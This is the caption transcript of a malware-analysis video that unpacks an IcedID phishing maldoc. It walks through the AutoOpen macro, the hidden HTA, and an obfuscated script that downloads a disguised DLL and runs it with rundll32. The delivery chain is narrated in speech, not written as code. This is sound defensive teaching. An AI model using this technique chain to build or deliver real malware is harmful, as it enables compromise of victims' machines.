Unraveling the IcedID Malware Stager & Phishing Email

Video Statistics and Information

Video
Captions Word Cloud
Reddit Comments
Captions
hello John quick background here my friend boss co-worker arch nemesis was sent an email from one of their trusted contacts that said hello important information for you please see the attachment password ujy 55 thanks and take care what an ironic ending he was of course later confirmed to have been compromised Defender identified some kind of Trojan and stopped my friendly co-worker boss nemesis from destroying his computer attaches the file if you'd like to investigate thanks and take care Lauren in this video we are going to take a look at that attached file we're going to explore what compromise her boss's computer and get to know how this all happened this is going to be a maldock file or a malicious document a malicious Microsoft Word document comes with Microsoft Office and with that said we are going to be exploring and taking apart some obfuscated scripting language code stuff that will naturally inherently run on Microsoft Windows as a Target operating system with some scripting language stuff so that you can more easily read it on understand the source code and for me too because I'm not super duper smart with all those compiled binaries and digging through disassembly and firing up in a debugger and all that Elite hacker stuff hey if you are interested in that if you want to be doing some of that hardcore reverse engineering please take a look at this video sponsor zero to Auto in the training course and curriculum that comes from offset training Solutions with that I'll go ahead and roll the promo and please go take a look at all the sweet stuff they have to offer zero to Auto offers in-depth and quality training on all things malware analysis and reverse engineering you learn to cut through malware samples understand the threat landscape and automate your workflow within the training you get access to 25 hours of video content covering cryptographic algorithms initial malware stagers malware evasion techniques core malware functionality like for banking Trojans worms web injects and more you dig into the exploitation process and learn what exactly is needed for professional threat intelligence included with the course is a 10 discount on an Ida Pro named license or an Ida home license a three-month Premium plan to the any.run sandbox and access to an exclusive Discord server where you can collaborate with other students get support for training material and receive new malware challenges right now the course has over 1500 students registered and always have access to new malware to cut up and learn from of course the training comes with the final exam and a course certification with both the theoretical segment and a Hands-On practical challenge where you reverse engineer custom malware and craft a report based off of your findings the zero to auto training comes from some seriously big names in the industry to include Vitale Kremes Daniel Bunce and Jason Reeves I'm sure you have seen them sharing incredible research and threat Intel and this is your opportunity to learn from some of the best check out the links in the description to jump into some zero to auto training right now and get 20 off by using the code malware at checkout if you're perhaps looking for something slightly less Advanced they're also in the process of remastering their original beginner malware analysis course which pre-registration is now open if you head to offset.net beginner.o being a zero you'll be able to register early for the course and grab an early bird discount huge thanks to offset training solutions for sponsoring this video okay so I am over here on my computer screen I am inside of a Windows 10 virtual machine that has Microsoft Office installed so that I can go ahead and play with this maldock file uh I do have the network connection disabled it is uh physically removed from my virtual machine here and I can go ahead and open up the info.zip file that was attached to this email there is our tell 12010 2021.doc we can go ahead and extract all of these into our desktop we'll go and extract that there and Oop There we go Defender immediately found something uh Microsoft Defender is jumping into action here and they say oops we found a threat we see the Trojan dropper for iced ID and we can go ahead and uh quarantine that remove it or allow it on the device I am going to go ahead and allow it on the device so I can do some more further digging so we'll go ahead and select that and start actions and now let me go ahead and move that away I do have this document here now ready for us and you know we'll go ahead and pull the trigger let's open this thing up in Microsoft Word and ooh take a look here this is kind of the classic usual phishing scheme or some social engineering trick that says hey this document was created in previous versions of Microsoft Word to view or edit this document please click enable editing or and then click enable content now note these are the things that will actually trigger and detonate malwares that have been included in a Microsoft Word document so that is not really recommended as you're doing your own analysis obviously that is what will start the problem and let the malware Run free we will not go ahead and click enable content but we will go ahead and explore what is actually in this macro so I'm going to move into the view Tab and you can see macros is accessible right over on the top right we'll go ahead and view macros and you'll note there is a macro included here called Auto open now we'll want to go ahead and edit this and see what is actually present here I don't know if you can see this text here I'll see if I can uh make this a little bit bigger okay okay now hopefully that's a little bit easier to read and note we have a public subroutine called Auto open auto open is going to be what exactly runs and executes as this document is opened and enable content enable editing is clicked so we have this structure for a function here we have a little bit of data that we could end up kind of cleaning or indenting to make this a little bit easier to read but this is the block of our subroutine we Define a variable YouTube Pal set to string reverse of this document.text pass in the argument keywords following that we end up using a with little context manager with the active document let's go ahead and save as given a file name set to YouTube pal the value returned from setting this variable above specifying the file format set to two man we don't really exactly need to care about what that might be I'm going to assume maybe plain text or ASCII and then once we're done with that with block we specify this document dot s with an empty string and YouTube pow passed in his arguments to presumably another subroutine so first of all we need to figure out what is happening at the very very first line we have YouTube pal being defined to the reverse string of this document dot text one of keywords now the question is what is text one and you might be able to click around a little bit more in exploring what the macros will show you in the Microsoft Visual Basic for applications editor you can see references to normal here's our main module and the Microsoft Word objects just a top here will include the this document settings now if I double click on this you'll notice oh it changes what's available in our editor if we clean this up just a little bit so we can make some sense of it we do have some functions that are defined and you might notice there is our text one function we'll start here and we'll get to explore a little bit it takes in an argument door like like okay weird random variable name and then text one is going to be set as a value now note this is the same exact name and value of the function name itself right that is actually how Visual Basic script or VBA and these Visual Basic applications will return a value from a function so the value set to text one as the same name as this function is exactly what this function will give back out to the main string reverse call here now it's taking in this keyword string as the argument to text one so that means that we're going to end up taking the active document built-in document properties door like like as the argument passed in as keywords we retrieve the value from that and that's what this function will return but then we run contents now contents as you'll note above is another function function contents what it does it takes the active document content and then finds and executes a find text X8 and replacing it with nothing an empty string here replace is equal to two maybe that's just referring to plain text once again we can kind of Hit the I will leave button there and then remember after contents is ran after we saved this document that returned here given the active document that is pulled from in that contents function we end up calling the this document.s function that takes in the arguments of an empty string and YouTube pow which is returned as the reverse of our keywords and that ultimately runs something different it takes in arguments like like load and Carol next love and then it creates an object this is going to end up being hey some quick little Windows internals object and I might be saying the right words there the wrong words there and that hey it's an active X object or some of the things that allow you to dig into other capabilities and functionality of Windows and a lot of those scripting languages we run text one based off of oh retrieving our properties category is the name here and then from that object that's created based off of the category property we'll go ahead and exec see Windows Explorer and Carol next love which is what would be passed in as the second argument so interesting it seems like we Define a variable and then it gets saved as a file name with the contents given from this document and then we try to Stage it to be able to open an Internet Explorer or excuse me the the Windows File Explorer right so let's explore this let's go see how we might be able to determine hey we've got this document text that we were able to track down but now we need to find the built-in document properties well these are things that you'll actually be able to retrieve within Microsoft Word if you go check out the file tab and you select info it shows you some of the properties might be a little bit interesting here uh you see some size page length words included words is a little bit interesting because that's not what we saw from just the front of it um and then tags is ath dot equil uh weird author is this last Modified by that so there's more that we might be able to explore here though if we click on that show all properties button down on the very bottom right show all properties we'll expand this and uh I'm curious though it doesn't give me more I was hoping for the keywords value we can see categories is included here as W script.shell which makes sense for it trying to create an object from W script.shell and then try to execute some function now if I click on the properties button here you can move into the advanced properties and this brings it up here for us now we can see the title subject author Etc but keyword is included that looks to be the very same as that tags value down there peculiar thing this is reversed remember if we take a look at this this is the value that we end up seeing reversed inside of our document going back to our macro code here in VBA we get this value and then we reverse it so let's go find out what that YouTube pal value should actually be I'm going to Pivot in and out of remnux here a remnix I'll be using for a little bit more analysis that is not within the actual Windows 11 virtual machine with Microsoft Office so what I'll do is I'll just create a I don't know play dot Pi file and that's just fine here now I've pasted this in and you know what uh we don't really need to do this with a python script you could do this in like bash or literally anything pipe it to rev but if we were just go ahead and print this out as a string and then let's reverse it we'll go ahead and use the square braces to go ahead and slice but we'll use uh no beginning or end of it and we'll set the iterator or the step to be negative one that will go ahead and reverse that string for me here now if I move that into my terminal I can go and run that and you can see ooh there's our value like pallike.hta HTA being a hypertext application or one of those ooh Microsoft Windows willingly going to execute some code that it will just run with in any user clicking on the link or opening it Through the Windows File Explorer so this will be the true file name that this thing saves as we should go ahead and actually maybe create our own likepowlike.hta file and then we'll go ahead and see what the contents might actually be remember YouTube pal that variable is now set to likepowlike.hta but the actual contents that we end up saving as although the contents of our active document but don't forget from our previous contents function that ran what we do is we take the active document content and then we replace all of those X8 values that might be potentially there with an empty string it just it just removes them all it just deletes them so why don't we go see what in our active documents might actually be included here you might remember well it's pretty dull it's pretty boring there's there's really nothing here other than this fishing lure oh sorry I don't know why my screen might glitch out when trying to full screen but note if I were to try and select everything or hit Ctrl a on my keyboard to select hey there's more than just the image here you could probably see it pretty well uh maybe this is just text that happens to be white if I change this to color to Red yeah there's a lot of noise and nonsense here or even black whatever we end up doing here this is the value that we would want to copy and paste so let me go bring that into our other remnix virtual machine and will it let me hear oh I'm not sure here we go slap it in just like this and note this has all of those X8 values a little bit of a mess here but we can clean this up right we can just use that find and replace functionality and find all of the X8 values and replace them with nothing I'm going to Control Alt Enter on my keyboard to go ahead and find and replace everything within Sublime Text and now we have a little bit more readable HTA style syntax noted it isn't starting with an HTML file and a whole lot of nonsense that we can dive into so let's save this we'll call this I suppose original uh or we could just leave it as the current file name and then let's start to modify it because I would like to make this a little bit easier to read so what I'm going to end up doing is just firing up a web browser and probably going to like oh some cheesy HTML beautify online there's one HTML viewer beautify HTML give me that thank you looking good let me go ahead and set that syntax to HTML within our Sublime Text Editor here and now we have a little bit more thing to read check it out you'll notice that we start with HTML as the normal HDA syntax and structure we Define some elements as like regular paragraphs but they all have unique ID values and the same sort of variable naming as our macro door light girl Dao girl Dao next love love on some weird stuff okay so next love love just looks to be the alphabets I'm assuming Dow girl Dao is just base64 uh oh but there's some weird stuff in there you can see there's hyphens there and then we have other JavaScript functions that are defined here so like tube door is going to be a new ActiveX object of the argument so that's worthwhile to note how often do we run this what we don't that that is not executed at least in here at least on that stage that's kind of weird load down next oh load down next is going to end up getting an element by an ID value and oh and getting the actual text of it so when in later functions we use that function load down next to get an ID that's our next love love here's our alphabet right so that's pulling that with door pound next as our variable we have like like set to an empty string other functions here Carol Carroll like returning a cha cha that's kind of odd I don't know why it just prepends that there um do we ever run this function no not in this stage okay so let's see what we might be able to dive into within this function uh we have some other variables that are defined and then it looks like it uses some regular Expressions to be able to replace content as needed and then do some Oddball math okay I don't exactly want to bother trying to reverse engineer this and you know see what happens where and when but truthfully we probably don't have to we might be able to finagle this and just let it go ahead and I don't know display this out like rather than go ahead and eval because one of these functions as you can see up here door light girl is simply eval so where do we call door like girl oh we use it down here and the function door pow Carol load down next is what's going to be retrieving that value so it gets the eval string and unlike door Carol is the current window moving to weird locations but using window indexed at the variable and the value eval will allow it to execute something and the next load U is going to be the argument that's passed in so door pal Carol sounds so stupid I'm sorry we'll end up calling it with door to load okay so door tube load is lovegirl Dao you download what is this video I um love girl Dao is doing some of the presumably yeah yeah okay so this is going to be the function that modifies it and then load like Dao does some splits and reverses okay so can we clean this to just be its own JavaScript script like just regularly run stuff so let's say um cleaned JavaScript maybe dot Js so we know that our alphabet over here and let me turn word wrap on so we can see that a little bit better where did we put our value of next love love we put that here so that can be changed to just be the alphabet or the printable character set right let's grab all of those and put them where door pound next was I believe right and then we need oh God next love love is good what else do we do with door-like girl remember that's eval okay so we can just replace that there and honestly because that just returns it we can just put the string eval right so that can go away and now we have Dow girl Dao as this weird random data uh uh let's just set that as a string I'm getting some weird horrific syntax highlighting because of all of our HTML crap so let's try and Nerf these and that was called oh goodness what now Girl doll yeah so VAR can equal all of that looking good so we don't need to do load down next anymore because now we have those variables present pulling them in and that's all that we end up pulling here for the rest of this code okay so Dow girl dial will be split and then we end up taking some door tube load I'm sorry I don't know if this is making sense to you but it is to me because we are just rearranging these variable names despite being whatever they are we're just kind of cutting it up so that we can grab what we need now the other things that are ran here like these functions that are defined up here we don't need to use eval to actually detonate this thing and you know what let's let's try and remove some of these scripts what does like door Carol do oh that's the one that is the window so we don't need to close the window in this case but it would have tried to close the window right had this been a natural W script or HTA file that goes ahead and detonates and then we will call this and then call this um door that is going to run eval in its current states and let's remove these script tags because they aren't exactly necessary um that oh shoot is this Visual Basic script yeah so not not JavaScript I I wrote the wrong thing that's weird the rest of it was JavaScript it just like switches in and out of those different languages I don't know if I like that anyway uh we can clean the rest of this and some of these will have a little bit more indentation to them oh God I ruined everything yeah whatever I'm fine with that this is all because it needs to be indented sure uh I'm good I'm good I'm good I believe it I trust it I think we have everything cut up we just need to make sure that we don't actually detonate this by using eval uh we want to actually just go ahead and use something like console.log or wscript.echo the thing is we don't even need to use this we can just use W script.echo can we not let's let's try a w script.echo because I do want to be able to run this on the Windows machine and let it unravel things so now call is what would be ran in Visual Basic script but let's just start with trying to run it run the function that will let this all unravel um and yeah that's it it's gonna Echo its own within this function so maybe we can trust it should we try it let's go experiment let's go play I'm gonna go over to my Windows 10 box um and let's create a new notepad file we'll just call it like test dot JS perfect okay now I'm going to go ahead and I want to open that I don't have the terminal I don't have like Windows terminal because I'm on Windows 10 but let's move into the desktop let's go and run notepad on test.js fire that thing up and let's paste in all this crappy code Here and Now fingers crossed let's run test.js oh something broke window is undefined yeah man because you're not in a stupid where did you even get window from is window in here oh yeah it is I'm sorry I guess we don't really need that those are the only things that would try to run with but yeah we don't need to do that in this case so let's Nerf those out um and then just make sure we Echo these how about that let's try this syntax fire that up ooh I want to be able to use C script to run this so I can actually display it on the command line so C script hello I don't know clear the screen C script please test.js and this is the next dump that it tries to run here so that would be I guess stage one how about that well I don't know stage one dot JS still going to be JavaScript and I didn't end up printing out the next one which truthfully we should do on load load girl and that I guess it can just spit it all out we don't need to split those up so this way we paste that syntax in and now when we clean this run it we should have all of the data there now I don't know because I do see some URLs that this one looks like a downlink from um and I'm not quite sure if this is going to have data that will actually respond for us let's go ahead and paste this in uh can you beautify this please no because it's not really HTML what if I did like script would you be able to clean that and script can you clean that yeah thank you thank you thank you okay cool so what we do from here is we create a new ActiveX object where we would be able to go ahead and download things so let's rename that variable and that let's not make this as confusing as the last one was um so XML HTTP object is really what we want to call that and then we open to Copeland benefit G yada yada yada random variables that would probably be keyed to the specific Target and then we send that request and if we actually get a successful response in the HTTP status then we load uh love load like with an adodb stream where we could go ahead and write all the response contents and put it into see users public load like load.jpg um [Music] and then we will detonate it with red server 32 so that is likely a dll file because that's how you would invoke dll files Dynamic link libraries um with a actual JPEG file here I'm not quite sure if this link yeah JPEG file that is not a jpeg file it is a dll file I'm not quite sure if this is actually going to still exist because it has been some time since this was sent to me and I doubt this domain is still alive but if it isn't hey you know we had a lot of fun at least rolling down to this point and I think I'm okay with that as a video so forgive me let me try and curl this thing not found yeah you can see it here uh that server is still up though however the uh Copeland benefitg.com is still a thing well I don't know how much further we'll be able to do with that kind of taken off line uh it would be worthwhile doing some maybe Googling around and learning hey you know what is this thing if it exists ooh this domain has been suspended due to a non-completion of an icann mandated contact verification fascinating okay um was this ever on any like iocs indicators of compromise obviously's domains HP threat research looks like it has one from ta-551 HP threat research oh super slick HP security that was doing a lot of their stuff what is ta-551 I'm assuming we're going to find out that that is iced ID gold cabin anyway they do have this in here right if I search for yeah Copa login and this was way back around that same time frame uh when this email was sent 2021 uh December 10th so about a year ago well I'm recording this miter attack is tracking this financially motivated threat group that's been active since 2018 email based malware distribution campaigns if folks aren't familiar by the way uh miter attack framework is an incredible resource um that kind of just lays the groundwork and sets a standard for how folks can talk about malicious activity or attack techniques tradecraft ttps tactics techniques and procedures uh you'll notice that all of these are kind of broken down into techniques and then eventually sub techniques uh and still mapping specific groups or threat actors or adversaries um it's interesting to see what they might kind of trigger here noting that hey we do have obfuscated variable names and JavaScript configuration files uh what did they say they mask dlls as dat files and JPEG files we would have seen that had this continued used mshta to execute payloads red server 32 to load malicious dlls etc etc prompted users to enable macros within spear phishing attachments to install malware I didn't see any indicator of iced ID or ice did or however people say that I don't know if that's oh here it is here's one from Red Canary Red Canary do an incredible stuff as always ta-551 also known as the same group that we were tracking uses large-scale fishing campaigns to deliver additional malware payloads ice ID and Valic are the predominant payloads we'd observed with fishing campaigns in 2020. oh so this is actually pretty old China Bell in 2020 and this is probably the exact same attack chain email with password protected zip archive remember that uh password protection is to trigger and or keep it safe so that antivirus won't immediately flag it um if there's any opportunity for it to kind of squeeze on the radar uh at least archiving the zip file with a password doesn't let the antivirus software kind of peer into it user opens document enables macros two-thirds of detection stop here yep okay so those are options that you might be able to block or stop the kill chain here network connection to download next stage dll installer and that would be what we would have continued on down the road for dll installer to execute following payload excuse me follow on payload with red server 32 a second Sage payload will be Earth sniff z-loader valak I said to your quackbot or cubot there so I guess we didn't dig into the real fun stuff here truthfully uh but we did get into the Stager and maybe that was kind of neat so you can see some of those again living off the land techniques the tricks that it might use Trend Micro is tacking this just as well unit 42 oh Sands even just as well lots of great folks keeping an eye on this one it was hot but that is how we might follow through with it and uh you might be able to do the very very same so hey with that said thanks so much for watching everybody I hope this was a little bit of a fun one hey just unraveling some more pieces playing with payloads and seeing what we might be able to de-obfuscate and get into or just track and you know what variables go where here and there um and maybe you'll learn a little bit or two with that uh if you haven't you know what you are going to learn a heck of a lot of stuff with the sponsor of today's video Zero to Auto and their training course it digs into some of that super sweet low-level disassembly running stuff up with a debugger when it's compiled application like an exe portable executable or a dll dynamic link Library so had we grabbed that iced ID actual payload you would be able to cut that up with the same skills and stuff that you learn within that sponsor so hey please please please go check them out see what they can do for you and learn some great stuff uh Kudos and all the credit and love to zero to Auto and offset turning Solutions so with that I'm dun rambling this has been a little bit of a long video and it didn't need to be but if you did enjoy this video please do those like comment algorithm subscribe stuff you know the same thing that I say at the end of every single video but I super appreciate all your support and uh it's six in the morning so I'm gonna go to bed bye everyone see you soon
Info
Channel: John Hammond
Views: 75,046
Rating: undefined out of 5
Keywords: cybersecurity, learn, programming, coding, capture the flag, ctf, malware, analysis, dark web, how to learn cybersecurity, beginners
Id: btHQYWoG3nU
Channel Id: undefined
Length: 33min 34sec (2014 seconds)
Published: Mon Dec 12 2022
Related Videos
FAKE Antivirus? Malware Analysis of Decoy 'kaspersky.exe'
John Hammond
263K
He tried to hack me...
John Hammond
357K
Unraveling a REMOTE ACCESS TROJAN (VBScript Deobfuscation)
John Hammond
155K
SOC Analyst Training: How to Detect Phishing Emails
Intezer
11K
Uncovering NETWIRE Malware - Discovery & Deobfuscation
John Hammond
86K
this Cybersecurity Platform is FREE
John Hammond
358K
I Stole a Microsoft 365 Account. Here's How.
John Hammond
261K
Malware Hunting with Mark Russinovich and the Sysinternals Tools
Mark Russinovich
53K
TARGETED Phishing - Fake Outlook Password Harvester
John Hammond
253K
Protect Yourself From Phishing Attacks: Learn Email Header and Suspecious Link (Malware) Analysis.
KamilSec
10K
Reversing WannaCry Part 1 - Finding the killswitch and unpacking the malware in #Ghidra
stacksmashing
1.1M
catch EVERY reverse shell while hacking! (VILLAIN)
John Hammond
205K
Bruteforcing MFA & Fail2ban Manipulation - TryHackMe! (Biteme)
John Hammond
87K
Email Header Analysis and Forensic Investigation
13Cubed
132K
Phishing Email Analysis with PhishTool | Part One | TryHackMe Threat Intelligence Tools
Motasem Hamdan
6.1K
Malware Development: Processes, Threads, and Handles
crow
590K
Mozi Malware - Finding Breadcrumbs...
John Hammond
192K
Malware Analysis for Beginners with REMnux!
Tech Raj
14K
12 Days of Defense - Day 4: How to Analyze Email Headers and How Spoofed Email Works
John Hubbard
20K
Note
Please note that this website is currently a work in progress! Lots of interesting data and statistics to come.